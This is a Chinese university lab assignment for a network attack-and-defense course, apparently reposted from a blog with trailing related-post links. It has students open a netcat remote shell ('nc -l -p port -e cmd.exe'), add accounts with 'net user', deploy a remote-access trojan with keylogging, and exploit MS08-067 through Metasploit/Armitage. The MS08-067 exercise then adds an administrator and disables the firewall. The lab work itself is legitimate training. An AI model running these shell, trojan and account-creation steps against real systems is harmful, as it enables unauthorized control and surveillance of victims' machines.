网络对抗技术—-网络对抗实验四
学 号:201421430008
中国人民公安大学
Chinese people’ public security university
网络对抗技术
实验报告
实验四 |
恶意代码技术 |
学生姓名 |
吴宙杨 |
年级 |
2014 |
区队 |
3 |
指导教师 |
高见老师 |
信息技术与网络安全学院
2016年11月7日
实验任务总纲
2016—2017 学年 第 一 学期
一、实验目的
1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
2.了解并熟悉常用的网络攻击工具,木马的基本功能;
3.达到巩固课程知识和实际应用的目的。
二、实验要求
1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。
2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。
3.软件工具可使用NC、MSF等。
4.实验结束后,保留电子文档。
三、实验步骤
1.准备
提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。
2.实验环境
描述实验所使用的硬件和软件环境(包括各种软件工具);
开机并启动软件office2003或2007、浏览器、加解密软件。
3.实验过程
1)启动系统和启动工具软件环境。
2)用软件工具实现实验内容。
4.实验报告
按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。
任务一 利用NC控制电脑
NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。
实验过程需要两个同学相互配合完成:
步骤一:
在受害者的机器 (同学A)
输入下面的命令:
nc.exe -l -p port -e cmd.exe 进入监听模式
步骤二:
在攻击者的机器.(同学B)
输入下面的命令:
nc ip port //连接victim_IP,然后得到一个shell。 (需要截图)
步骤三:
在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。(需要截图)
可以继续通过命令行做一些事情。
任务二 利用木马控制电脑
实验过程需要两个同学配合:
步骤一:
攻击者的机器. (同学A)
打开V2014.exe程序或则star RAT,这两个木马功能类似。
步骤二:
点击菜单栏中的“服务生成”,在弹出的配置服务端中,配置回连IP地址(攻击者IP)和端口号,并点击“生成”按钮,生成木马服务端。
步骤三:
将生成的木马可执行程序拷贝到受害者的机器,并双击运行。
步骤四:
在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。
1、控制主机
2、获取桌面
3、拷贝文件
4、键盘记录
6、重启电脑
任务三 通过漏洞获取shell(合天平台中做) 所有过程截图写博客
windows ms08067 漏洞利用
在平台中获取shell之后,继续利用攻击机器使用
net user user pass /add
net localgroup administrators /add
命令向被攻击的机器中添加账户,并提升为管理员
然后用rdesktop 10.1.1.130 登陆对方的远程桌面
关闭xp系统主机的防火墙
查看攻击主机的ip地址和账户
启动Armitage
检索10.1.1.0/24网段
对130进行检测
搜寻到适应的攻击模块
配置攻击信息
利用Metasploit shall获得xp主机的管理员权限
利用cmd shall建立attacker的账户
利用rdesktop远程登录xp系统的attacker(密码:123465)
转载于:https://www.cnblogs.com/P201421430008/p/7751529.html
网络对抗技术—-网络对抗实验四相关推荐
- 中国人民公安大学(PPSUC) 网络对抗技术第二次实验
中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验二 网络嗅探与欺骗 学生姓名 刘旭东 年级 2015级 ...
- 网络对抗技术 -网络侦查与网络扫描
中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验一 网络侦查与网络扫描 学生姓名 翟一鸣 年级 2014 ...
- 网络对抗技术——网络嗅探与欺骗(第三部分)
中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验二 网络嗅探与欺骗 学生姓名 袁昊晨 年级 2014 区 ...
- 网络对抗技术——网络嗅探与欺骗(第一二部分)非平台
中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验二 网络嗅探与欺骗 学生姓名 翟一鸣 年级 2014 区 ...
- 网络攻防技术-Lab5-shellcode编写实验(SEED Labs – Shellcode Development Lab)
网络攻防技术实验,实验环境.实验说明.实验代码见 Shellcode Development Lab Task 1: Writing Shellcode a: The Entire Process 1 ...
- 网络攻防技术——幽灵攻击实验
一.题目 幽灵攻击于2017年发现,并于2018年1月公开披露,它利用关键漏洞进行攻击,存在于许多现代处理器中,包括Intel.AMD和ARM处理器.漏洞允许程序突破进程间和进程内的隔离,以便恶意程序 ...
- 网络工程201306114136张文雅实验四
[目的] 掌握Android中颜色和字符串资源的使用方法. 理解Android中尺寸和布局资源的使用方法. [要求] 在工程中为Activity.View使用颜色资源: 使用字符串资源并理解字符串资源 ...
- java程序设计与【j2ee中间件技术】/【软件开发技术(III)】-实验四-编写简单的jsp页面
目录 题目1 1 题目说明 2 实验设计 3 运行界面截图与说明 4 代码 login.jsp success.jsp validate.jsp 题目2 1 题目说明 2 实验设计 3 运行界面截图与 ...
- 面向气象灾害预警信息的5G网络切片技术研究
摘要:研究了面向气象灾害预警信息精准快速传播需求,并针对传输需求设计网络切片SLA指标,给出了面向气象预警信息传输的网络切片设计参考方案. 关键词:气象预警信息:网络切片:SLA:5G 0 引言 目 ...
最新文章
- 嵌入式中常见的几个死循环:
- 天池 在线编程 LR String
- iOS打开沙盒html,iOS WKWebView加载本地/沙盒HTML及css、images
- 红米Note 8 Pro新配色公布:轻盈一握宛若浮华在手
- linux mysql 主从数据库_【Linux】【MySQL】MySQL主从数据库
- A - Divisors POJ - 2992 (组合数C的因子数)数学—大数
- 图卷积网络GCN理解
- 基于PHP+MySQL共享自行车租赁管理系统的设计与实现
- Youtube更改视频原始语言
- 第一篇:阿里数据中台之数据中台顶层设计
- c#中regex的命名空间_C#_详解C#正则表达式Regex常用匹配,使用Regex类需要引用命名空间 - phpStudy...
- Android11更新包,Android11系统
- 阿里云域名注册流程(全流程详细教程)
- 小伙Python爬虫并自制新闻网站,太好玩了
- c语言追光篮球程序,追光篮球游戏下载-追光篮球苹果版v1.0_6137游戏网
- android最新版本6,keep安卓官方最新版
- postgresql 流复制切换
- 机器人是如何实现避障的?
- 基于RSA盲签名的隐私集合求交PSI算法
- 声学多普勒流速剖面仪_声学多普勒流速剖面仪ADCP
热门文章
- 多模态语义分析_「CV学霸开讲」卷积神经网络压缩、多模态的语义分析研究
- python自由落体_VPython - example - 模拟自由落体运动
- python中list函数中variables变量_如何在Python中使用变量,浅谈,Pytorch,的,Variable,方法...
- python爬虫什么网站都能爬吗_python如何爬取动态网站
- linux 6.2 期末考试题,redhat6.2-linux考试试卷(带部分答案)
- python简笔画怎么画_怎样用tk语句在Python下画一棵树
- pip install时发生raise ReadTimeoutError(self._pool, None, 'Read timed out.')的解决方案
- LeetCode 1922. 统计好数字的数目(快速幂)
- LeetCode 第 25 场双周赛(718/1832,前39.2%)
- 程序员面试金典 - 面试题 01.04. 回文排列(哈希map)